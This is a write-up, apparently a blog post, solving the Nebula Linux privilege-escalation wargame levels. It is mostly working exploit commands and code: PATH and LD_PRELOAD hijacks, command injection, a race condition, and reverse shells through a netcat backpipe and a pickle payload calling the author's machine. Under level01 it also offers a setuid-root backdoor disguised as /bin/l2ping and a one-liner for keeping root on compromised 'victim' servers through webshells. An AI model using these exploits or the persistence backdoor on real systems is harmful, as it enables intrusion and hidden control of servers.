nebula系统学习
9 minute read
0xff About Nebula
Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at
SUID files
Permissions
Race conditions
Shell meta-variables
$PATH weaknesses
Scripting language weaknesses
Binary compilation failures
At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.
official website: https://exploit-exercises.com/nebula/
nebula.iso download: https://pan.baidu.com/s/1dFdRIm9
some witeup:
google-->cache:https://lightless.me/archives/Nebula-writeup.html
or
https://pan.baidu.com/s/1mhQgqCg
or
https://github.com/join-us/exploit-exercises/blob/master/Nebula/level11.md
0x00 level00
mykey:
su - level00
pass:level00
find / -type f -perm -4000 -ls > tmp.txt
link knowledge:
linux中suid,sgid,sticky详解:https://crazyming.blog.51cto.com/1048571/467414
find / -type f -perm -4000 -ls > tmp.txt function:find suid files
find / -type f -perm -4000 -ls | grep "flag00" > tmp.txt function:find file has setuid=flag00
find / -type f -perm -2000 -ls > tmp.txt function:find sgid files
find / -perm -2 -type f -print function:find files can be writeable by everyone
echo "/bin/cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh" >> writeable_file_if_it_is_from_any_autorun_directory
/tmp/.sh -p(this command to get a euid=root shell)
0x01 level01
mykey:
su - level01
password:level01
PATH=/tmp:$PATH;export PATH;echo $PATH
vi /tmp/echo
-----content-----
/bin/sh
------end--------
chmod +x /tmp/echo
cd /home/flag01
./flag01
getflag
link knowledge:
the source code of /home/flag01/flag01 is:
------------content of source.c------------
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
------------end----------------------------
when I trid to execute some commands as upon "mykey" do,but without its "chmod +x /tmp/echo",I found it can not return a shell with suid=flag01 to execute /home/flag01/flag01,later I added chmod +x /tmp/echo,it succeeded.
ls -l /home/flag01 --> -rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
this means file flag01's owner is user flag01,belongs to group level01,but has setuid attribute,so when other user like level01 will get file flag01's owner(that is user flag01)'s privilege
which getflag-->/bin/getflag
ls -l /bin/getflag--> -rwxr-xr-x 1 root root 7311 2011-11-23 14:51 /bin/getflag
then execute upon "mykey" commands to pass level01,/bin/getflag is a program checks whether the user who execute /bin/getflag belongs to "flag account",when a "non-flag account" like level01 trys to execute /bin/getflag,it returns:"getflag is executing on a non-flag account,this doesn't count"
however,when I first didn't add "chmod +x /tmp/echo" in "mykey",I thought may be there exists some error in level01,and tried to change the source code of /home/flag01/flag01 to file.c:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo && echo runtime error.");
}
------------end------------------------
that is change the final system sentence from "system("/usr/bin/env echo and now what?");" to "system("/usr/bin/env echo && echo runtime error.");",and this could be a "works well backdoor" when get a root shell in a system:
to use this file.c as a root shell backdoor after got a root shell,
use root role execute:
gcc -o 1 file.c
mv 1 /bin/l2ping
chmod 4755 /bin/l2ping(or in common user: sudo chown root /bin/l2ping;sudo chmod +s /bin/l2ping)
use webshell role execute:
PATH=/tmp:$PATH
export PATH
echo $PATH(to check if /tmp is in $PATH)
ln -s /bin/sh /tmp/echo
or:PATH=/tmp:$PATH;export PATH;echo $PATH;ln -s /bin/sh /tmp/echo
(later I found this will not get root shell,coz a new terminal shell created[/tmp/echo-->/bin/sh] by upon way will not display in webshells' terminal)
then use webshell role to get a root privilege shell:
/bin/l2ping
both source.c and file.c can be a root privilege backdoor shell,the difference between source.c and file.c is:
by source.c we should execute "chmod +x /tmp/echo"
by file.c we should execute "ln -s /bin/sh /tmp/echo"
*attention*:
when I tried to keep root privilege in webshell,and conveniently execute commands in webshell but with root privilege(so I don't have to use reGeorg and proxycap and putty and upon two kinds of backdoor to connect target victim pc and execute commands with root shell,these actions are too slow to control target server),I tried to use root privilege to execute:
chmod 4755 /..../..../webshell.php(eg.b374kshell)
browser visit-->https://xxx/xxx/xxx/webshell.php ---> terminal:
id
out:auid=48(apache) gid=48(apache) groups=48(apache)
later I realized a webshell.php file with setuid=root will not execute as root privilege,coz only executable files like elf,*.sh files will execute as root privilege,*.php file is not in the scope,so my webshell's terminal will has apache's privilege,not root,I could chmod 4755 apache to get root privilege in webshell.php,but it's not wise.
!!!cool thing:
one sentence to keep root shell in webshell(strong webshell better,like b374k,chopper may be stopped to execute a normal command when there exists some waf),use webshell's terminal function to execute:
PATH=/tmp:$PATH;export PATH;echo $PATH;/bin/echo "whoami" > /tmp/.out;rm /tmp/echo;ln -s /tmp/.out /tmp/echo;chmod +x /tmp/.out;/bin/l2ping > /tmp/.out1;cat /tmp/.out1;rm /tmp/.out1
this means with role apache's privilege to execute a program(a file with setuid=root),but it will has root privilege to execute commands,change "whoami" to any commond is ok to execute as root privilege.
0x02 level02
mykey:
su - level02
pass:level02
USER="nihao;sh"
./flag02
getflag
0x03 level03
mykey:
su - level03
pass:level03(下文略去su - levelxx;pass:levelxx)
cd /home/flag03
vi writable.d/1.sh
---------content------
(id;getflag) > /tmp/tmp.txt
----------end---------
chmod +x writable/1.sh
0x04 level04
mykey:
cd /home/flag04
ln -s /home/flag04/token /tmp/level04
./flag04 /tmp/level04
0x05 level05
mykey:
cd /home/flag05
ls -la
cp ./backup/* /home/level05
cd /home/level05
tar zxvf backup[tab]
ls -la(then found .ssh directory created in common directory</home/level05>)
ssh flag05@127.0.0.1
yes
getflag
0x06 level06
mykey:
vi /etc/passwd
v--> flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh --> :<,>w pass.txt
use kali2's john
john pass.txt
get flag06:hello
su - flag06
pass:hello
getflag
0x07 level07
mykey:
ctr+alt+f2 --> tty2
tty2:nc -lnv 8888
ctr+alt+f1(backto tty1)
tty1:wget -O- "https://127.0.0.1:7007/index.cgi?Host=127.0.0 || mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 127.0.0.1 8888 1>/tmp/backpipe"
ctr+alt+f2 --> tty2
tty2:id(flag07),getflag
link knowledge:
for security,the linux system may not support -e parameter in netcat(nc -e ip port),so one way to exploit is:
mknod /tmp/backpipe p
/bin/bash 0</tmp/backpipe | nc 127.0.0.1 8888 1>/tmp/backpipe
0x08 level08
mykey:
scp level08@192.168.2.140:/home/flag08/capture.pcap /root/Desktop/
wireshark to open /root/Desktop/capture.pcap
use wireshark,choose any tcp data,right click mouse,choose follow tcp stream
find password:...
use hex dump view to find 7f==>. is backspace
su - flag08
pass:backd00Rmate
getflag
0x09 level09
mykey:
vi /tmp/level09.txt
----content----
[email {${system($use_me)}}]
-----end-------
cd /home/flag09
./flag09 /tmp/level09.txt getflag
0x10 level10
mykey:
vi /tmp/level10_1
----conent------
#!/bin/sh
while true;
do
ln -sf /tmp/level10_2 /tmp/level10_3
ln -sf /home/flag10/token /tmp/level10_3
done
----end---------
touch /tmp/level10_2
touch /tmp/level10_3
chmod +x /tmp/level10_1
vi /tmp/level10_11
------content------
#!/bin/sh
while true;
do
/home/flag10/flag10 /tmp/level10_3 192.168.2.140
done
-----end-----------
chmod +x /tmp/level10_3
use another terminal:
nc -lv 18211
use another terminal:
ssh level10@192.168.2.140
pass:level10
/tmp/level10_1
use another terminal:
ssh level10@192.168.2.140
pass:level10
/tmp/level10_11
find the terminal with nc -lv 18211 received the content of token
su - flag10
pass:content of token
getflag
0x11 level11
mykey:
there are two ways:
(https://blackndoor.com/nebula-level11/)
(https://github.com/join-us/exploit-exercises/blob/master/Nebula/level11.md)
0x12 level12
mykey:
nc 127.0.0.1 50001
Pass:
test;getflag > /tmp/level12
vi /tmp/level12
0x13 level13
mykey:
vi /tmp/level13.c
-----content-------
#include <sys/types.h>
int getuid(void)
{
return 1000;
}
-------------------
gcc -shared -fPIC /tmp/level13.c -o /tmp/level13.so
LD_PRELOAD="/tmp/level13.so"
export LD_PRELOAD
cp /home/flag13/flag13 /home/level13/
/home/level13/flag13
0x14 level14
mykey:
--------py--------
def main(string):
length=len(string)
out=""
for i in range(length):
#print type(chr(ord(string[length-1-i])-(length-1-i)))
#print chr(ord(string[length-1-i])-(length-1-i))[0]
out+=(chr(ord(string[length-1-i])-(length-1-i))[0])
return out
if __name__=='__main__':
import sys
print main(sys.argv[1])
------------------
0x15 level15
cd /home/flag15
strace ./flag15
found one line:open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
vi /var/tmp/flag15/exploit.c
------------exploit.c-----------
#include <unistd.h>
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {
execl("/bin/getflag", (char *)NULL, (char *)NULL);
}
--------------------------------
cd /var/tmp/flag15
gcc -g -fPIC -c exploit.c (-g===>for gdb,-c===>产生目标文件,不产生可执行文件)
ll
exploit.c
exploit.o
gcc exploit.o -shared -o libc.so.6
/home/flag15/flag15
relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc│[~] [~] [~]
.so.6 with link time reference
vi verscript
---verscript-----
GLIBC_2.0{
global:__libc_start_main;
local: *;
};
-----------------
gcc -shared -Wl,--version-script,verscript,-Bstatic -static-libgcc -o libc.so.6 exploit.o
/home/flag15/flag15
0x16 level16
mykey:
vi /tmp/exp.sh
----content-----
/bin/getflag>>/tmp/level16.out
----------------
another terminal:
nv -lv 1616
origin terminal:
wget https://localhost:1616/index.cgi?username=%22%3C%2FDEV%2FNULL%3BP%3D%2FTMP%2FEXP.SH%3B%24{P%2C%2C}%3B%23&password=
urldecode: "</DEV/NULL;P=/TMP/EXP.SH;${P,,};#
0x17 level17
mykey:
vi /root/桌面/1.py
-----1.py-----
#!/usr/bin/python
import socket
HOST = '192.168.2.147'
PORT = 10007
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((HOST,PORT))
recv = sock.recv(1024)
print "Receive : %s\n" % recv
exploit = "cos\nsystem\n(S'/bin/bash -i>& /dev/tcp/192.168.3.106/51242 0>&1'\ntR.\n"
sock.send(exploit)
recv = sock.recv(2048)
-----end------
nc -lvp 51242
python /root/桌面/1.py
receive a new shell with ruid=flag17
>getflag
0x18 level18
mykey:
python -c 'print "login iii\r\n"*50+"closelog\r\n"+"shell\r\n"' | /home/flag18/flag18 --rcfile -d log -v -v -v
out:'Starting can not find'
... can not find
... can not find
cd /home/flag18
vi log
-----content------
Starting up. ......
something ....
------end---------
vi /tmp/Starting
----Starting---
/bin/flag > /tmp/level18.out
-----end-------
*****attention:*****
not not forget to:
chmod +x /tmp/Starting
*******end*******
python -c 'print "login iii\r\n"*50+"closelog\r\n"+"shell\r\n"' | /home/flag18/flag18 --rcfile -d log -v -v -v
vi /tmp/level18.out
link knowledge:
https://v0ids3curity.blogspot.kr/2012/09/exploit-exercise-improper-file-handling.html
0x19 level19
mykey:
on kali(192.168.3.106)
vi /tmp/level19.c
------------level19.c-------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
int main(void)
{
pid_t pid;
char* args[]={"/bin/sh","-c","getflag > /tmp/level19.out",NULL};
pid=fork();
if (pid==0)
{
nice(19);
execve("/home/flag19/flag19",args,NULL);
}
else if (pid<0)
{
printf("Ups\n");
}
else
{
exit(1);
}
return 0;
}
--------------end---------------
gcc -o /tmp/level19 /tmp/level19.c
scp /tmp/level19 level19@192.168.2.147:/home/level19
ll(find "x" in /home/level19/level19,could be executed)
ssh level19@192.168.2.147
pass:level19
cd /home/level19
./level19
out:binary can not be executed
back to kali(192.168.3.106)
scp /tmp/level19.c level19@192.168.2.147:/home/level19/
ssh level19@192.168.2.147
pass:level19
cd /home/level19
gcc -o level19-1 level19.c
chmod +x level19-1
./level19-1
vi /tmp/level19.out
succeed
link knowledge:
https://www.cnblogs.com/bastard/archive/2012/08/31/2664896.html
https://www.cnblogs.com/mydomain/archive/2011/09/27/2193247.html